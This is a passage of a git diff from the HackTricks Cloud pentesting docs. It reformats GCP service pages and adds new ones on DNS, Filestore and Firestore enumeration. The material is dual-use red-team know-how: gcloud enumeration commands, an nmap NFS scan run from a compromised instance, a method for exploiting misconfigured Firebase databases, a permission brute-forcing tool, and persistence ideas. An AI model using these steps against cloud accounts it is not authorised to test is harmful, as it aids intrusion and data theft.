-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md similarity index 54% rename from pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md index 87cc18241..a55faeb46 100644 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md @@ -1,19 +1,6 @@ # GCP - VPC & Networking -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## **GCP Compute Networking in a Nutshell** 
@@ -34,28 +21,27 @@ By default, every network has two [**implied firewall rules**](https://cloud.goo When a GCP project is created, a VPC called **`default`** is also created, with the following firewall rules: -* **default-allow-internal:** allow all traffic from other instances on the `default` network -* **default-allow-ssh:** allow 22 from everywhere -* **default-allow-rdp:** allow 3389 from everywhere -* **default-allow-icmp:** allow ping from everywhere +- **default-allow-internal:** allow all traffic from other instances on the `default` network +- **default-allow-ssh:** allow 22 from everywhere +- **default-allow-rdp:** allow 3389 from everywhere +- **default-allow-icmp:** allow ping from everywhere -{% hint style="warning" %} -As you can see, **firewall rules** tend to be **more permissive** for **internal IP addresses**. The default VPC permits all traffic between Compute Instances. -{% endhint %} +> [!WARNING] +> As you can see, **firewall rules** tend to be **more permissive** for **internal IP addresses**. The default VPC permits all traffic between Compute Instances. More **Firewall rules** can be created for the default VPC or for new VPCs. [**Firewall rules**](https://cloud.google.com/vpc/docs/firewalls) can be applied to instances via the following **methods**: -* [**Network tags**](https://cloud.google.com/vpc/docs/add-remove-network-tags) -* [**Service accounts**](https://cloud.google.com/vpc/docs/firewalls#serviceaccounts) -* **All instances within a VPC** +- [**Network tags**](https://cloud.google.com/vpc/docs/add-remove-network-tags) +- [**Service accounts**](https://cloud.google.com/vpc/docs/firewalls#serviceaccounts) +- **All instances within a VPC** Unfortunately, there isn't a simple `gcloud` command to spit out all Compute Instances with open ports on the internet. You have to connect the dots between firewall rules, network tags, services accounts, and instances. 
This process was automated using [this python script](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp_firewall_enum) which will export the following: -* CSV file showing instance, public IP, allowed TCP, allowed UDP -* nmap scan to target all instances on ports ingress allowed from the public internet (0.0.0.0/0) -* masscan to target the full TCP range of those instances that allow ALL TCP ports from the public internet (0.0.0.0/0) +- CSV file showing instance, public IP, allowed TCP, allowed UDP +- nmap scan to target all instances on ports ingress allowed from the public internet (0.0.0.0/0) +- masscan to target the full TCP range of those instances that allow ALL TCP ports from the public internet (0.0.0.0/0) ### Hierarchical Firewall Policies @@ -69,7 +55,7 @@ You can read here how to [**create a Hierarchical Firewall Policy**](https://clo ### Firewall Rules Evaluation -
+
1. Org: Firewall policies assigned to the Organization 2. Folder: Firewall policies assigned to the Folder @@ -84,29 +70,16 @@ Peered VPC networks can be in the same project, different projects of the same o These are the needed permissions: -* `compute.networks.addPeering` -* `compute.networks.updatePeering` -* `compute.networks.removePeering` -* `compute.networks.listPeeringRoutes` +- `compute.networks.addPeering` +- `compute.networks.updatePeering` +- `compute.networks.removePeering` +- `compute.networks.listPeeringRoutes` [**More in the docs**](https://cloud.google.com/vpc/docs/vpc-peering). ## References -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) -* [https://cloud.google.com/vpc/docs/firewall-policies-overview#rule-evaluation](https://cloud.google.com/vpc/docs/firewall-policies-overview#rule-evaluation) +- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) +- [https://cloud.google.com/vpc/docs/firewall-policies-overview#rule-evaluation](https://cloud.google.com/vpc/docs/firewall-policies-overview#rule-evaluation) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md similarity index 58% rename from pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md index 5724894e6..a06af7e15 100644 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md @@ -1,19 +1,6 @@ # GCP - Containers & GKE Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Containers @@ -41,9 +28,9 @@ sudo docker pull HOSTNAME// In the following page you can check how to **abuse container permissions to escalate privileges**: -{% content-ref url="../gcp-privilege-escalation/gcp-container-privesc.md" %} -[gcp-container-privesc.md](../gcp-privilege-escalation/gcp-container-privesc.md) -{% endcontent-ref %} +{{#ref}} +../gcp-privilege-escalation/gcp-container-privesc.md +{{#endref}} ## Node Pools @@ -59,9 +46,9 @@ gcloud container node-pools describe --cluster --zone [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md new file mode 100644 index 000000000..8742886bc --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md @@ -0,0 +1,25 @@ +# GCP - DNS Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## GCP - Cloud DNS + +Google Cloud DNS is a high-performance, resilient, global Domain Name System (DNS) service. + +```bash +# This will usually error if DNS service isn't configured in the project +gcloud dns project-info describe + +# Get DNS zones & records +gcloud dns managed-zones list +gcloud dns managed-zones describe +gcloud dns record-sets list --zone # Get record of the zone + +# Policies +## A response policy is a collection of selectors that apply to queries made against one or more virtual private cloud networks. +gcloud dns response-policies list +## DNS policies control internal DNS server settings. You can apply policies to DNS servers on Google Cloud Platform VPC networks you have access to. +gcloud dns policies list +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md new file mode 100644 index 000000000..aaa7bacc7 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md 
@@ -0,0 +1,74 @@ +# GCP - Filestore Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## Basic Information + +Google Cloud Filestore is a **managed file storage service** tailored for applications in need of both a **filesystem interface and a shared filesystem for data**. This service excels by offering high-performance file shares, which can be integrated with various GCP services. Its utility shines in scenarios where traditional file system interfaces and semantics are crucial, such as in media processing, content management, and the backup of databases. + +You can think of this like any other **NFS** **shared document repository -** a potential source of sensitive info. + +### Connections + +When creating a Filestore instance it's possible to **select the network where it's going to be accessible**. + +Moreover, by **default all clients on the selected VPC network and region are going to be able to access it**, however, it's possible to **restrict the access also by IP address** or range and indicate the access privilege (Admin, Admin Viewer, Editor, Viewer) user the client is going to get **depending on the IP address.** + +It can also be accessible via a **Private Service Access Connection:** + +- Are per VPC network and can be used across all managed services such as Memorystore, Tensorflow and SQL. +- Are **between your VPC network and network owned by Google using a VPC peering**, enabling your instances and services to communicate exclusively by **using internal IP addresses**. +- Create an isolated project for you on the service-producer side, meaning no other customers share it. You will be billed for only the resources you provision. +- The VPC peering will import new routes to your VPC + +### Backups + +It's possible to create **backups of the File shares**. These can be later **restored in the origin** new Fileshare instance or in **new ones**. 
+ +### Encryption + +By default a **Google-managed encryption key** will be used to encrypt the data, but it's possible to select a **Customer-managed encryption key (CMEK)**. + +### Enumeration + +If you find a filestore available in the project, you can **mount it** from within your compromised Compute Instance. Use the following command to see if any exist. + +```bash +# Instances +gcloud filestore instances list # Check the IP address +gcloud filestore instances describe --zone # Check IP and access restrictions + +# Backups +gcloud filestore backups list +gcloud filestore backups describe --region + +# Search for NFS shares in a VPC subnet +sudo nmap -n -T5 -Pn -p 2049 --min-parallelism 100 --min-rate 1000 --open 10.99.160.2/20 +``` + +> [!CAUTION] +> Note that a filestore service might be in a **completely new subnetwork created for it** (inside a Private Service Access Connection, which is a **VPC peer**).\ +> So you might need to **enumerate VPC peers** to also run nmap over those network ranges. +> +> ```bash +> # Get peerings +> gcloud compute networks peerings list +> # Get routes imported from a peering +> gcloud compute networks peerings list-routes --network= --region= --direction=INCOMING +> ``` + +### Privilege Escalation & Post Exploitation + +There aren't ways to escalate privileges in GCP directly abusing this service, but using some **Post Exploitation tricks it's possible to get access to the data** and maybe you can find some credentials to escalate privileges: + +{{#ref}} +../gcp-post-exploitation/gcp-filestore-post-exploitation.md +{{#endref}} + +### Persistence + +{{#ref}} +../gcp-persistence/gcp-filestore-persistence.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} 
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md similarity index 59% rename from pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md index e4302bc44..a2a9fafd4 100644 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md @@ -1,19 +1,6 @@ # GCP - Firebase Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## [Firebase](https://cloud.google.com/sdk/gcloud/reference/firebase/) @@ -26,7 +13,7 @@ Some **Firebase endpoints** could be found in **mobile applications**. It is pos This is the common methodology to search and exploit poorly configured Firebase databases: 1. **Get the APK** of app you can use any of the tool to get the APK from the device for this POC.\ - You can use “APK Extractor” [https://play.google.com/store/apps/details?id=com.ext.ui\&hl=e](https://hackerone.com/redirect?signature=3774f35d1b5ea8a4fd209d80084daa9f5887b105\&url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.ext.ui%26hl%3Den) + You can use “APK Extractor” [https://play.google.com/store/apps/details?id=com.ext.ui\&hl=e](https://hackerone.com/redirect?signature=3774f35d1b5ea8a4fd209d80084daa9f5887b105&url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.ext.ui%26hl%3Den) 2. **Decompile** the APK using **apktool**, follow the below command to extract the source code from the APK. 3. Go to the _**res/values/strings.xml**_ and look for this and **search** for “**firebase**” keyword 4. You may find something like this URL “_**https://xyz.firebaseio.com/**_” @@ -73,8 +60,8 @@ To test other actions on the database, such as writing to the database, refer to If you decompile the iOS application and open the file `GoogleService-Info.plist` and you find the API Key and APP ID: -* API KEY **AIzaSyAs1\[...]** -* APP ID **1:612345678909:ios:c212345678909876** +- API KEY **AIzaSyAs1\[...]** +- APP ID **1:612345678909:ios:c212345678909876** You may be able to access some interesting information 
@@ -84,20 +71,7 @@ You may be able to access some interesting information ## References -* ​[https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/](https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/)​ -* ​[https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1](https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1)​ +- ​[https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/](https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/)​ +- ​[https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1](https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1)​ -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md
new file mode 100644
index 000000000..2e63d18cd
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md
@@ -0,0 +1,17 @@
+# GCP - Firestore Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/)
+
+Cloud Firestore, provided by Firebase and Google Cloud, is a **database that is both scalable and flexible, catering to mobile, web, and server development needs**. Its functionalities are akin to those of Firebase Realtime Database, ensuring data synchronization across client applications with realtime listeners. A significant feature of Cloud Firestore is its support for offline operations on mobile and web platforms, enhancing app responsiveness even in conditions of high network latency or absence of internet connection. Moreover, it is designed to integrate smoothly with other products from Firebase and Google Cloud, such as Cloud Functions.
+
+```bash
+gcloud firestore indexes composite list
+gcloud firestore indexes composite describe
+gcloud firestore indexes fields list
+gcloud firestore indexes fields describe
+gcloud firestore export gs://my-source-project-export/export-20190113_2109 --collection-ids='cameras','radios'
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md
similarity index 55%
rename from pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md
rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md
index a66c58493..df894ea13 100644
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md @@ -1,27 +1,14 @@ # GCP - IAM, Principals & Org Policies Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Service Accounts For an intro about what is a service account check: -{% content-ref url="../gcp-basic-information/" %} -[gcp-basic-information](../gcp-basic-information/) -{% endcontent-ref %} +{{#ref}} +../gcp-basic-information/ +{{#endref}} ### Enumeration 
@@ -35,24 +22,22 @@ gcloud iam service-accounts list --project For an intro about how Users & Groups work in GCP check: -{% content-ref url="../gcp-basic-information/" %} -[gcp-basic-information](../gcp-basic-information/) -{% endcontent-ref %} +{{#ref}} +../gcp-basic-information/ +{{#endref}} ### Enumeration With the permissions **`serviceusage.services.enable`** and **`serviceusage.services.use`** it's possible to **enable services** in a project and use them. -{% hint style="danger" %} -Note that by default, Workspace users are granted the role **Project Creator**, giving them access to **create new projects**. When a user creates a project, he is granted the **`owner`** role over it. So, he could **enable these services over the project to be able to enumerate Workspace**. - -However, notice that it's also needed to have **enough permissions in Workspace** to be able to call these APIs. -{% endhint %} +> [!CAUTION] +> Note that by default, Workspace users are granted the role **Project Creator**, giving them access to **create new projects**. When a user creates a project, he is granted the **`owner`** role over it. So, he could **enable these services over the project to be able to enumerate Workspace**. +> +> However, notice that it's also needed to have **enough permissions in Workspace** to be able to call these APIs. If you can **enable the `admin` service** and if your user has **enough privileges in workspace,** you could **enumerate all groups & users** with the following lines.\ Even if it says **`identity groups`**, it also returns **users without any groups**: -{% code overflow="wrap" %} ```bash # Enable admin gcloud services enable admin.googleapis.com 
@@ -75,15 +60,13 @@ gcloud identity groups memberships search-transitive-memberships --group-email=< ## Get a graph (if you have enough permissions) gcloud identity groups memberships get-membership-graph --member-email= --labels=cloudidentity.googleapis.com/groups.discussion_forum ``` -{% endcode %} -{% hint style="success" %} -In the previous examples the param `--labels` is required, so a generic value is used (it's not requires if you used the API directly like [**PurplePanda does in here**](https://github.com/carlospolop/PurplePanda/blob/master/intel/google/discovery/disc_groups_users.py). -{% endhint %} +> [!TIP] +> In the previous examples the param `--labels` is required, so a generic value is used (it's not requires if you used the API directly like [**PurplePanda does in here**](https://github.com/carlospolop/PurplePanda/blob/master/intel/google/discovery/disc_groups_users.py). Even with the admin service enable, it's possible that you get an error enumerating them because your compromised workspace user doesn't have enough permissions: -
+
## IAM @@ -95,14 +78,13 @@ From the [**docs**](https://cloud.google.com/resource-manager/docs/default-acces These **roles** grant the **permissions**: -* `billing.accounts.create` and `resourcemanager.organizations.get` -* `resourcemanager.organizations.get` and `resourcemanager.projects.create` +- `billing.accounts.create` and `resourcemanager.organizations.get` +- `resourcemanager.organizations.get` and `resourcemanager.projects.create` Moreover, when a user creates a project, he is **granted owner of that project automatically** according to the [docs](https://cloud.google.com/resource-manager/docs/access-control-proj). Therefore, by default, a user will be able to create a project and run any service on it (miners? Workspace enumeration? ...) -{% hint style="danger" %} -The highest privilege in a GCP Organization is the **Organization Administrator** role. -{% endhint %} +> [!CAUTION] +> The highest privilege in a GCP Organization is the **Organization Administrator** role. ### set-iam-policy vs add-iam-policy-binding @@ -136,7 +118,7 @@ gcloud iam list-grantable-roles There are different ways to check all the permissions of a user in different resources (such as organizations, folders, projects...) using this service. -* The permission **`cloudasset.assets.searchAllIamPolicies`** can request **all the iam policies** inside a resource. +- The permission **`cloudasset.assets.searchAllIamPolicies`** can request **all the iam policies** inside a resource. ```bash gcloud asset search-all-iam-policies #By default uses current configured project 
@@ -145,7 +127,7 @@ gcloud asset search-all-iam-policies --scope organizations/123456 gcloud asset search-all-iam-policies --scope projects/project-id-123123 ``` -* The permission **`cloudasset.assets.analyzeIamPolicy`** can request **all the iam policies** of a principal inside a resource. +- The permission **`cloudasset.assets.analyzeIamPolicy`** can request **all the iam policies** of a principal inside a resource. ```bash # Needs perm "cloudasset.assets.analyzeIamPolicy" over the asset @@ -157,7 +139,7 @@ gcloud asset analyze-iam-policy --project= \ --identity='user:email@hacktricks.xyz' ``` -* The permission **`cloudasset.assets.searchAllResources`** allows listing all resources of an organization, folder, or project. IAM related resources (like roles) included. +- The permission **`cloudasset.assets.searchAllResources`** allows listing all resources of an organization, folder, or project. IAM related resources (like roles) included. ```bash gcloud asset search-all-resources --scope projects/ @@ -165,14 +147,14 @@ gcloud asset search-all-resources --scope folders/1234567 gcloud asset search-all-resources --scope organizations/123456 ``` -* The permission **`cloudasset.assets.analyzeMove`** but be useful to also retrieve policies affecting a resource like a project +- The permission **`cloudasset.assets.analyzeMove`** but be useful to also retrieve policies affecting a resource like a project ```bash gcloud asset analyze-move --project= \ --destination-organization=609216679593 ``` -* I suppose the permission **`cloudasset.assets.queryIamPolicy`** could also give access to find permissions of principals +- I suppose the permission **`cloudasset.assets.queryIamPolicy`** could also give access to find permissions of principals ```bash # But, when running something like this 
@@ -183,48 +165,47 @@ ERROR: (gcloud.asset.query) UNAUTHENTICATED: QueryAssets API is only supported f ### testIamPermissions enumeration -{% hint style="danger" %} -If you **cannot access IAM information** using the previous methods and you are in a Red Team. You could **use the tool**[ **https://github.com/carlospolop/bf\_my\_gcp\_perms**](https://github.com/carlospolop/bf_my_gcp_perms) **to brute-force your current permissions.** - -However, note that the service **`cloudresourcemanager.googleapis.com`** needs to be enabled. -{% endhint %} +> [!CAUTION] +> If you **cannot access IAM information** using the previous methods and you are in a Red Team. You could **use the tool**[ **https://github.com/carlospolop/bf_my_gcp_perms**](https://github.com/carlospolop/bf_my_gcp_perms) **to brute-force your current permissions.** +> +> However, note that the service **`cloudresourcemanager.googleapis.com`** needs to be enabled. ### Privesc In the following page you can check how to **abuse IAM permissions to escalate privileges**: -{% content-ref url="../gcp-privilege-escalation/gcp-iam-privesc.md" %} -[gcp-iam-privesc.md](../gcp-privilege-escalation/gcp-iam-privesc.md) -{% endcontent-ref %} +{{#ref}} +../gcp-privilege-escalation/gcp-iam-privesc.md +{{#endref}} ### Unauthenticated Enum -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md" %} -[gcp-iam-principals-and-org-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md +{{#endref}} ### Post Exploitation -{% content-ref url="../gcp-post-exploitation/gcp-iam-post-exploitation.md" %} -[gcp-iam-post-exploitation.md](../gcp-post-exploitation/gcp-iam-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../gcp-post-exploitation/gcp-iam-post-exploitation.md +{{#endref}} ### Persistence 
If you have high privileges you could: -* Create new SAs (or users if in Workspace) -* Give principals controlled by yourself more permissions -* Give more privileges to vulnerable SAs (SSRF in vm, vuln Cloud Function…) -* … +- Create new SAs (or users if in Workspace) +- Give principals controlled by yourself more permissions +- Give more privileges to vulnerable SAs (SSRF in vm, vuln Cloud Function…) +- … ## Org Policies For an intro about what Org Policies are check: -{% content-ref url="../gcp-basic-information/" %} -[gcp-basic-information](../gcp-basic-information/) -{% endcontent-ref %} +{{#ref}} +../gcp-basic-information/ +{{#endref}} The IAM policies indicate the permissions principals has over resources via roles, which are assigned granular permissions. Organization policies **restrict how those services can be used or which features are disabled**. This helps in order to improve the least privilege of each resource in the GCP environment. @@ -238,21 +219,8 @@ gcloud resource-manager org-policies list --project=PROJECT_ID In the following page you can check how to **abuse org policies permissions to escalate privileges**: -{% content-ref url="../gcp-privilege-escalation/gcp-orgpolicy-privesc.md" %} -[gcp-orgpolicy-privesc.md](../gcp-privilege-escalation/gcp-orgpolicy-privesc.md) -{% endcontent-ref %} +{{#ref}} +../gcp-privilege-escalation/gcp-orgpolicy-privesc.md +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md similarity index 57% rename from pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md index 2e2c0be96..25d143161 100644 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md @@ -1,19 +1,6 @@ # GCP - KMS Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## KMS 
@@ -23,20 +10,20 @@ KMS key rings are by **default created as global**, which means that the keys in ### Key Protection Level -* **Software keys**: Software keys are **created and managed by KMS entirely in software**. These keys are **not protected by any hardware security module (HSM)** and can be used for t**esting and development purposes**. Software keys are **not recommended for production** use because they provide low security and are susceptible to attacks. -* **Cloud-hosted keys**: Cloud-hosted keys are **created and managed by KMS** in the cloud using a highly available and reliable infrastructure. These keys are **protected by HSMs**, but the HSMs are **not dedicated to a specific customer**. Cloud-hosted keys are suitable for most production use cases. -* **External keys**: External keys are **created and managed outside of KMS**, and are imported into KMS for use in cryptographic operations. External keys **can be stored in a hardware security module (HSM) or a software library, depending on the customer's preference**. +- **Software keys**: Software keys are **created and managed by KMS entirely in software**. These keys are **not protected by any hardware security module 